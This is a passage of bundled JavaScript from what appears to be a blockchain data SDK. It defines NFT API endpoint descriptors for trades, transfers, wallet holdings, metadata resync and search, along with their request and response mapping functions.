        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        tokenId: request.tokenId,
        normalizeMetadata: request.normalizeMetadata,
        disableTotal: request.disableTotal,
        mediaItems: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$w(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        format: jsonRequest.format,
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        tokenId: jsonRequest.tokenId,
        normalizeMetadata: jsonRequest.normalizeMetadata,
        disableTotal: jsonRequest.disableTotal,
        mediaItems: jsonRequest.mediaItems
    };
}
/** Get trades of NFTs for a given contract and marketplace. */ var $3dfc2d9370ba0cd1$export$2a578995a1c7d86b = {
    method: "GET",
    name: "getNFTTrades",
    id: "getNFTTrades",
    groupName: "nft",
    urlPathPattern: "/nft/{address}/trades",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "fromBlock",
        "toBlock",
        "fromDate",
        "toDate",
        "marketplace",
        "cursor",
        "limit",
        "disableTotal"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$v,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$v,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$v,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$v
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$v(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        from_date: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        marketplace: request.marketplace,
        cursor: request.cursor,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        disable_total: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$v(jsonResponse) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(trade) {
        return $3dfc2d9370ba0cd1$export$af80c79c3efd2de2.fromJSON(trade);
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$v(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        fromDate: request.fromDate,
        toDate: request.toDate,
        marketplace: request.marketplace,
        cursor: request.cursor,
        limit: request.limit,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        disableTotal: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$v(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        fromDate: jsonRequest.fromDate,
        toDate: jsonRequest.toDate,
        marketplace: jsonRequest.marketplace,
        cursor: jsonRequest.cursor,
        limit: jsonRequest.limit,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        disableTotal: jsonRequest.disableTotal
    };
}
/** Get transfers of NFTs given a block number or block hash. */ var $3dfc2d9370ba0cd1$export$d0862a1d34b55e14 = {
    method: "GET",
    name: "getNFTTransfersByBlock",
    id: "getNFTTransfersByBlock",
    groupName: "nft",
    urlPathPattern: "/block/{blockNumberOrHash}/nft/transfers",
    urlPathParamNames: [
        "blockNumberOrHash"
    ],
    urlSearchParamNames: [
        "chain",
        "limit",
        "cursor",
        "disableTotal"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$u,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$u,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$u,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$u
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$u(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        blockNumberOrHash: request.blockNumberOrHash,
        disable_total: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$u(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(transfer) {
        return $3dfc2d9370ba0cd1$export$b04bf5e0fc45755d.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(transfer)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.token_address),
            toAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.to_address),
            operator: transfer.operator ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.operator) : null,
            fromAddress: transfer.from_address ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.from_address) : null,
            value: transfer.value ? $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create(transfer.value, "wei") : null,
            blockTimestamp: new Date(transfer.block_timestamp)
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$u(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        limit: request.limit,
        cursor: request.cursor,
        blockNumberOrHash: request.blockNumberOrHash,
        disableTotal: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$u(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        blockNumberOrHash: jsonRequest.blockNumberOrHash,
        disableTotal: jsonRequest.disableTotal
    };
}
/** Get transfers of NFTs from a block number to a block number. */ var $3dfc2d9370ba0cd1$export$fab71468f9b1bd68 = {
    method: "GET",
    name: "getNFTTransfersFromToBlock",
    id: "getNFTTransfersFromToBlock",
    groupName: "nft",
    urlPathPattern: "/nft/transfers",
    urlSearchParamNames: [
        "chain",
        "fromBlock",
        "toBlock",
        "fromDate",
        "toDate",
        "format",
        "limit",
        "cursor",
        "disableTotal"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$t,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$t,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$t,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$t
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$t(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        from_date: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        format: request.format,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        disable_total: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$t(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(transfer) {
        return $3dfc2d9370ba0cd1$export$b04bf5e0fc45755d.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(transfer)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.to_address),
            toAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.to_address),
            operator: transfer.operator ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.operator) : null,
            fromAddress: transfer.from_address ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.from_address) : null,
            value: transfer.value ? $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create(transfer.value, "wei") : null,
            blockTimestamp: new Date(transfer.block_timestamp)
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$t(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        fromDate: request.fromDate,
        toDate: request.toDate,
        format: request.format,
        limit: request.limit,
        cursor: request.cursor,
        disableTotal: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$t(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        fromDate: jsonRequest.fromDate,
        toDate: jsonRequest.toDate,
        format: jsonRequest.format,
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        disableTotal: jsonRequest.disableTotal
    };
}
/** Get transfers of an NFT given a contract address and token ID. */ var $3dfc2d9370ba0cd1$export$4c8b5b836c918cf8 = {
    method: "GET",
    name: "getNFTTransfers",
    id: "getNFTTransfers",
    groupName: "nft",
    urlPathPattern: "/nft/{address}/{tokenId}/transfers",
    urlPathParamNames: [
        "address",
        "tokenId"
    ],
    urlSearchParamNames: [
        "chain",
        "format",
        "limit",
        "cursor",
        "disableTotal"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$s,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$s,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$s,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$s
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$s(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        format: request.format,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        tokenId: request.tokenId,
        disable_total: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$s(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(transfer) {
        return $3dfc2d9370ba0cd1$export$b04bf5e0fc45755d.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(transfer)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.to_address),
            toAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.to_address),
            operator: transfer.operator ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.operator) : null,
            fromAddress: transfer.from_address ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.from_address) : null,
            value: transfer.value ? $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create(transfer.value, "wei") : null,
            blockTimestamp: new Date(transfer.block_timestamp)
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$s(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        format: request.format,
        limit: request.limit,
        cursor: request.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        tokenId: request.tokenId,
        disableTotal: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$s(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        format: jsonRequest.format,
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        tokenId: jsonRequest.tokenId,
        disableTotal: jsonRequest.disableTotal
    };
}
/** Get NFT collections owned by a given wallet address. */ var $3dfc2d9370ba0cd1$export$596d8eca99fc248e = {
    method: "GET",
    name: "getWalletNFTCollections",
    id: "getWalletNFTCollections",
    groupName: "nft",
    urlPathPattern: "/{address}/nft/collections",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "limit",
        "cursor",
        "disableTotal"
    ],
    firstPageIndex: 1,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$r,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$r,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$r,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$r
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$r(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        disable_total: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$r(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(collection) {
        return $3dfc2d9370ba0cd1$export$74e13a6454c09045.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(collection)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(collection.token_address)
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$r(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        limit: request.limit,
        cursor: request.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        disableTotal: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$r(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        disableTotal: jsonRequest.disableTotal
    };
}
/**
 * Get NFTs owned by a given address.
 * * The response will include status [SYNCED/SYNCING] based on the contracts being indexed.
 * * Use the token_address param to get results for a specific contract only
 * * Note results will include all indexed NFTs
 * * Any request which includes the token_address param will start the indexing process for that NFT collection the very first time it is requested.
 */ var $3dfc2d9370ba0cd1$export$a7f18fa4ab405966 = {
    method: "GET",
    name: "getWalletNFTs",
    id: "getWalletNFTs",
    groupName: "nft",
    firstPageIndex: 1,
    urlPathPattern: "/{address}/nft",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "format",
        "limit",
        "tokenAddresses",
        "cursor",
        "normalizeMetadata",
        "disableTotal",
        "mediaItems"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$q,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$q,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$q,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$q
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$q(request, core) {
    var _a;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        format: request.format,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        token_addresses: (_a = request.tokenAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        cursor: request.cursor,
        normalizeMetadata: request.normalizeMetadata,
        disable_total: request.disableTotal,
        media_items: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$q(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(data) {
        var nft = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(data);
        var chain = $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core);
        return $3dfc2d9370ba0cd1$export$29af622dd51db3c5.create({
            chain: chain,
            contractType: nft.contractType,
            tokenAddress: nft.tokenAddress,
            tokenId: nft.tokenId,
            tokenUri: nft.tokenUri,
            metadata: nft.metadata,
            name: nft.name,
            symbol: nft.symbol,
            amount: nft.amount ? parseInt(nft.amount, 10) : undefined,
            blockNumberMinted: nft.blockNumberMinted,
            blockNumber: nft.blockNumber,
            ownerOf: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(nft.ownerOf),
            tokenHash: nft.tokenHash,
            lastMetadataSync: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(nft.lastMetadataSync),
            lastTokenUriSync: (0, $10891f2cb3e98601$export$8b9fef4a5a83984)(nft.lastTokenUriSync),
            possibleSpam: nft.possibleSpam,
            media: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(nft.media, function(media) {
                return $3dfc2d9370ba0cd1$export$e5237d1bf4cd5e83.create($3dfc2d9370ba0cd1$var$__assign({
                    chain: chain
                }, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(media)));
            })
        });
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$q(request, core) {
    var _a;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        format: request.format,
        limit: request.limit,
        tokenAddresses: (_a = request.tokenAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).checksum;
        }),
        cursor: request.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        normalizeMetadata: request.normalizeMetadata,
        disableTotal: request.disableTotal,
        mediaItems: request.mediaItems
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$q(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        format: jsonRequest.format,
        limit: jsonRequest.limit,
        tokenAddresses: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(jsonRequest.tokenAddresses, function(addresses) {
            return addresses.map(function(address) {
                return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
            });
        }),
        cursor: jsonRequest.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        normalizeMetadata: jsonRequest.normalizeMetadata,
        disableTotal: jsonRequest.disableTotal,
        mediaItems: jsonRequest.mediaItems
    };
}
/** Get transfers of NFTs given the wallet and other parameters. */ var $3dfc2d9370ba0cd1$export$2446d41cee2f639c = {
    method: "GET",
    name: "getWalletNFTTransfers",
    id: "getWalletNFTTransfers",
    groupName: "nft",
    urlPathPattern: "/{address}/nft/transfers",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "format",
        "direction",
        "fromBlock",
        "toBlock",
        "limit",
        "cursor",
        "disableTotal",
        "fromDate",
        "toDate"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$p,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$p,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$p,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$p
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$p(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        format: request.format,
        direction: request.direction,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: request.toBlock,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        disable_total: request.disableTotal,
        from_date: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromDate, function(date) {
            return new Date(date).toISOString();
        }),
        to_date: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toDate, function(date) {
            return new Date(date).toISOString();
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$p(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(transfer) {
        return $3dfc2d9370ba0cd1$export$b04bf5e0fc45755d.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(transfer)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            tokenAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.token_address),
            toAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.to_address),
            operator: transfer.operator ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.operator) : null,
            fromAddress: transfer.from_address ? $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(transfer.from_address) : null,
            value: transfer.value ? $3dfc2d9370ba0cd1$export$62862bdd1f71aa78.create(transfer.value, "wei") : null,
            blockTimestamp: new Date(transfer.block_timestamp)
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$p(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        format: request.format,
        direction: request.direction,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        limit: request.limit,
        cursor: request.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        disableTotal: request.disableTotal,
        fromDate: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromDate, function(date) {
            return new Date(date).toISOString();
        }),
        toDate: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toDate, function(date) {
            return new Date(date).toISOString();
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$p(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        format: jsonRequest.format,
        direction: jsonRequest.direction,
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        disableTotal: jsonRequest.disableTotal,
        fromDate: jsonRequest.fromDate,
        toDate: jsonRequest.toDate
    };
}
/**
 * ReSync the metadata for an NFT
 * * The metadata flag will request a the NFT's metadata from the already existing token_uri
 * * The uri(default) flag will fetch the latest token_uri from the given NFT address. In sync mode the metadata will also be fetched
 * * The sync mode will make the endpoint synchronous so it will wait for the task to be completed before responding
 * * The async mode(default) will make the endpoint asynchronous so we will wait for the task to be completed before responding
 */ var $3dfc2d9370ba0cd1$export$c37fa52dec548eb2 = {
    method: "GET",
    name: "reSyncMetadata",
    id: "reSyncMetadata",
    groupName: "nft",
    urlPathPattern: "/nft/{address}/{tokenId}/metadata/resync",
    urlPathParamNames: [
        "address",
        "tokenId"
    ],
    urlSearchParamNames: [
        "chain",
        "flag",
        "mode"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$o,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$o,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$o,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$o
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$o(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase,
        flag: request.flag,
        mode: request.mode,
        tokenId: request.tokenId
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$o(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        flag: request.flag,
        mode: request.mode,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum,
        tokenId: request.tokenId
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$o(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        flag: jsonRequest.flag,
        mode: jsonRequest.mode,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address),
        tokenId: jsonRequest.tokenId
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$o(jsonResponse) {
    return jsonResponse;
}
/** Get NFTs that match a given metadata search query. */ var $3dfc2d9370ba0cd1$export$905c7ba175e51715 = {
    method: "GET",
    name: "searchNFTs",
    id: "searchNFTs",
    groupName: "nft",
    urlPathPattern: "/nft/search",
    urlSearchParamNames: [
        "chain",
        "format",
        "q",
        "filter",
        "fromBlock",
        "toBlock",
        "fromDate",
        "toDate",
        "addresses",
        "cursor",
        "limit",
        "disableTotal"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$n,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$n,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$n,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$n
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$n(request, core) {
    var _a;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        format: request.format,
        q: request.q,
        filter: request.filter,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        from_date: request.fromDate ? new Date(request.fromDate).toISOString() : undefined,
        to_date: request.toDate ? new Date(request.toDate).toISOString() : undefined,
        addresses: (_a = request.addresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        cursor: request.cursor,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        disable_total: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$n(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(nft) {
        return {
            token: $3dfc2d9370ba0cd1$export$29af622dd51db3c5.create({
                chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
                contractType: nft.contract_type,
                tokenAddress: nft.token_address,
                tokenId: nft.token_id,
                tokenUri: nft.token_uri,
                metadata: nft.metadata,
                tokenHash: nft.token_hash,
                possibleSpam: nft.possible_spam
            }),
            tokenHash: nft.token_hash,
            blockNumberMinted: nft.block_number_minted,
            lastMetadataSync: nft.last_metadata_sync ? new Date(nft.last_metadata_sync) : undefined,
            lastTokenUriSync: nft.last_token_uri_sync ? new Date(nft.last_token_uri_sync) : undefined,
            batchId: nft.batch_id,
            frozen: nft.frozen,
            frozenLogIndex: nft.frozen_log_index,
            imported: nft.imported,
            isValid: nft.is_valid,
            openseaLookup: nft.opensea_lookup,
            resyncing: nft.resyncing,
            syncing: nft.syncing,
            updatedAt: new Date(nft.updatedAt)
        };
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$n(request, core) {
    var _a;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        format: request.format,
        q: request.q,
        filter: request.filter,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        fromDate: request.fromDate,
        toDate: request.toDate,
        addresses: (_a = request.addresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
